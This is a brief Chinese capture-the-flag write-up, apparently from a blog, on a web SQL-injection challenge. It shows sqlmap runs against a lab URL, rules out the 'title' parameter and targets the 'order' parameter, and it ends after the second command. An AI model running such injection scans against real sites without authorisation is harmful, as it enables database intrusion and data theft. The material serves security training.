前言
题目分类:
CTF—Web—SQL注入—10—get传参的删减
一、题目描述
题目:小试牛刀
![在这里插入图片描述](https://img-blog.csdnimg.cn/287935fb05434bd5a18115fe502fae23.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzIyMTYwNTU3,size_16,color_FFFFFF,t_70)
二、解题步骤
1、注入点的确定
Step1:利用http://172.16.15.193/stage/9/get_info.php?title=xiaoshiniudao&order=id
这个网址跑sqlmap,提示title不是注入点。
![在这里插入图片描述](https://img-blog.csdnimg.cn/f1ac8049c25d42b5aadc60517e706d51.png)
Step2:此题为get传参,参数可以删减。猜测注入点为order。
sqlmap -u http://172.16.15.193/stage/9/get_info.php?order=id --db